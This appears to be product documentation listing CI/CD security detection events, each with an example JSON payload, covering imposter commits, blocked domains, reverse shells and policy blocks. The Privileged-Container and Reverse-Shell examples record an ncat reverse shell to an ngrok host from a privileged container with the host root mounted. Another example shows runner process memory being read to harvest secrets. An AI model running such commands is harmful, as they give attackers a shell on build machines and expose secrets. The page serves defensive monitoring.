Integrations
StepSecurity supports integrations with external platforms to enhance your security workflows, automate telemetry export, and streamline policy enforcement.
We currently support two third party integrations:
Detection Scenarios
Each detection event is emitted in real-time and includes detailed metadata about the workflow, job, detection, and offending artifacts. Below is a list of detection types currently supported by StepSecurity, along with example payloads for each.
Action-Uses-Commit-From-Non-Default-Branch
{
"id": "Action-Uses-Commit-From-Non-Default-Branch",
"name": "Action Uses Commit From Non Default Branch",
"owner": "actions-security-demo",
"repo": "actions-security-demo/poc-1",
"workflow_id": "actions-security-demo-actions-security-demo/poc-1-.github-workflows-test-workflow.yaml",
"workflow_path": ".github/workflows/test-workflow.yaml",
"run_id": "14372875584",
"job_id": "40299087623",
"job": "Test",
"timestamp": "1744262248",
"detection": "Action-Uses-Commit-From-Non-Default-Branch-14372875584-40299087623",
"id_timestamp": "Action-Uses-Commit-From-Non-Default-Branch-1744262248",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"imposter_commit": {
"action": "ashishkurmi/hello-action",
"tag": "main",
"sha": "c5327f7d9d31e29e58e788cb3c2727f773b3d0c4",
"timestamp": "1744262248"
}
}Action-Uses-Imposter-Commit
{
"id": "Action-Uses-Imposter-Commit",
"name": "GitHub Action Uses Imposter Commit",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445268",
"job": "imposter-commit",
"timestamp": "1753203994",
"detection": "Action-Uses-Imposter-Commit-step-security/dummy-compromised-action-c96c327cecdb71e8f031080ba8ad208feb25b13d",
"id_timestamp": "Action-Uses-Imposter-Commit-1753203994",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"imposter_commit": {
"action": "step-security/dummy-compromised-action",
"tag": "v1",
"sha": "c96c327cecdb71e8f031080ba8ad208feb25b13d",
"timestamp": "1753203994",
"is_imposter_commit": true,
"is_commit_on_default_branch": false
},
"owner_repo": "step-security/poc-workflows"
}Domain-Blocked
{
"id": "Domain-Blocked",
"name": "Domain Blocked",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445322",
"endpoint": "0.tcp.us-cal-1.ngrok.io.",
"timestamp": "1753204032",
"detection": "Domain-Blocked-0.tcp.us-cal-1.ngrok.io.",
"id_timestamp": "Domain-Blocked-1753204032",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/poc-workflows"
}HTTPS-Outbound-Network-Call
{
"id": "HTTPS-Outbound-Network-Call",
"name": "HTTPS Outbound Call",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445302",
"timestamp": "1753204001",
"detection": "HTTPS-Outbound-Network-Call-POST-api.github.com",
"method": "POST",
"host": "api.github.com",
"path": "/repos/step-security-experiments/github-actions-goat/actions/runners/registration-token",
"id_timestamp": "HTTPS-Outbound-Network-Call-1753204001",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/poc-workflows"
}New-Outbound-Network-Call
{
"id": "New-Outbound-Network-Call",
"name": "New Outbound Network Call",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445257",
"job": "anomalous-outbound-call",
"endpoint": "5ad46aa12a0f0fc0.example.com:443",
"timestamp": "1753204032",
"detection": "New-Outbound-Network-Call-5ad46aa12a0f0fc0.example.com:443",
"expected_outbound_connections": [
"github.com:443",
"www.google.com:443",
"goreleaser.com:443",
"7f6045df5f070c28.example.com:443",
"f6daed2a23eaf1c1.example.com:443",
"4baf29081c970e17.example.com:443",
"98a77cfd80e40ed6.example.com:443",
"0de402b8ec115cc9.example.com:443"
],
"id_timestamp": "New-Outbound-Network-Call-1753204032",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/poc-workflows"
}Privileged-Container
{
"id": "Privileged-Container",
"name": "Privileged Container Detected",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445255",
"job": "privileged-conatiner",
"timestamp": "1753203999",
"detection": "Privileged-Container-privileged-conatiner",
"id_timestamp": "Privileged-Container-1753203999",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/poc-workflows",
"process_events": [
{
"pid": "2489",
"ppid": "2488",
"exe": "/usr/bin/docker",
"working_directory": "/home/runner/work/poc-workflows/poc-workflows",
"arguments": [
"docker",
"run",
"--privileged",
"--cap-add=ALL",
"-v",
"/:/host",
"raesene/ncat:latest",
"0.tcp.us-cal-1.ngrok.io",
"17658",
"-e",
"/bin/bash"
],
"timestamp": "2025-07-22T17:06:39.374Z"
}
]
}Reverse-Shell
{
"id": "Reverse-Shell",
"name": "Reverse shell detected",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445255",
"job": "privileged-conatiner",
"timestamp": "1753204005",
"detection": "Reverse-Shell-privileged-conatiner",
"id_timestamp": "Reverse-Shell-1753204005",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/poc-workflows",
"process_events": [
{
"pid": "2569",
"ppid": "2547",
"exe": "/usr/local/bin/ncat",
"working_directory": "/",
"arguments": [
"/usr/local/bin/ncat",
"0.tcp.us-cal-1.ngrok.io",
"17658",
"-e",
"/bin/bash"
],
"timestamp": "2025-07-22T17:06:45.265Z"
}
]
}Runner-Worker-Memory-Read
{
"id": "Runner-Worker-Memory-Read",
"name": "Runner Worker Memory Read",
"owner": "step-security",
"repo": "armour-tests",
"workflow_id": "step-security-armour-tests-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16463564626",
"job_id": "46535652393",
"job": "tj-actions-simulation",
"timestamp": "1753253227",
"detection": "Runner-Worker-Memory-Read-tj-actions-simulation",
"id_timestamp": "Runner-Worker-Memory-Read-1753253227",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/armour-tests",
"process_events": [
{
"pid": "2068",
"exe": "python3",
"timestamp": "2025-07-23T06:47:07.869380629Z",
"armour_event_process": {
"armour_event_kind": "FILE_READ",
"timestamp": "2025-07-23T06:47:07.869380629Z",
"file_info": {
"is_write": false,
"current_pid": 2068,
"current_exe": "python3",
"target_file": "/proc/1798/mem",
"target_pid": 1798,
"target_exe": "Runner.Worker"
},
"enforced_protection": false
}
}
]
}Secret-In-Build-Log
{
"id": "Secret-In-Build-Log",
"name": "Secret In Build Log",
"owner": "step-security",
"repo": "poc-workflows",
"workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16450863125",
"job_id": "46495445378",
"timestamp": "1753204001",
"detection": "Secret-In-Build-Log-handle-private-key-private-key",
"secret": "----*******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************--",
"line_number": "14",
"rule_id": "private-key",
"job_name": "handle-private-key",
"step_number": "5",
"id_timestamp": "Secret-In-Build-Log-1753204001",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/poc-workflows"
}Source-Code-Overwritten
{
"id": "Source-Code-Overwritten",
"name": "Source Code Overwritten",
"owner": "step-security",
"repo": "armour-tests",
"workflow_id": "step-security-armour-tests-.github-workflows-poc_workflow.yml",
"workflow_path": ".github/workflows/poc_workflow.yml",
"run_id": "16476557099",
"job_id": "46579649138",
"job": "source-code",
"file": "README.MD",
"timestamp": "1753288775",
"detection": "Source-Code-Overwritten-README.MD",
"path": "/home/runner/work/armour-tests/armour-tests/README.MD",
"id_timestamp": "Source-Code-Overwritten-1753288775",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"owner_repo": "step-security/armour-tests"
}Actions-Policy-Blocked
{
"id": "Actions-Policy-Blocked",
"name": "Actions Policy Blocked",
"owner": "step-security",
"repo": "arm-int-tests",
"workflow_path": ".github/workflows/poc_workflow_int.yml",
"run_id": "16625207256",
"timestamp": "1753885200",
"detection": "Actions-Policy-Blocked-16625207256",
"id_timestamp": "1753885200",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"actions_not_allowed": [
"step-security/harden-runner@rc-20-int",
"actions/checkout@v3",
"step-security/dummy-compromised-action@v1",
"actions/checkout@v4"
]
}Runs-On-Policy-Blocked
{
"id": "Runs-On-Policy-Blocked",
"name": "Runs-On Policy Blocked",
"owner": "step-security",
"repo": "arm-int-tests",
"workflow_path": ".github/workflows/poc_workflow_int.yml",
"run_id": "16625207256",
"timestamp": "1753885200",
"detection": "Runs-On-Policy-Blocked-16625207256",
"id_timestamp": "Runs-On-Policy-Blocked-1753885200",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"runs_on_labels_not_allowed": ["label1", "label2", ...]
}Secrets-Policy-Blocked
{
"id": "Secrets-Policy-Blocked",
"name": "Secrets Policy Blocked",
"owner": "step-security",
"repo": "arm-int-tests",
"workflow_path": ".github/workflows/poc_workflow_int.yml",
"run_id": "16625207256",
"timestamp": "1753885200",
"detection": "Secrets-Policy-Blocked-16625207256",
"id_timestamp": "Secrets-Policy-Blocked-1753885200",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"workflow_contains_secrets": "true/false",
"is_non_default_branch": "true/false",
"workflow_matches_default_ref": "true/false",
"current_branch_hash": "[hash]",
"default_branch_hash": "[hash]"
}Compromised-Actions-Policy-Blocked
{
"id": "Compromised-Actions-Policy-Blocked",
"name": "Compromised Actions Policy Blocked",
"owner": "step-security",
"repo": "arm-int-tests",
"workflow_path": ".github/workflows/poc_workflow_int.yml",
"run_id": "16625207256",
"timestamp": "1753885200",
"detection": "Compromised-Actions-Policy-Blocked-16625207256",
"id_timestamp": "Compromised-Actions-Policy-Blocked-1753885200",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"compromised_actions_detected": ["compromised-action1", "compromised-action2", ...]
}Last updated
Was this helpful?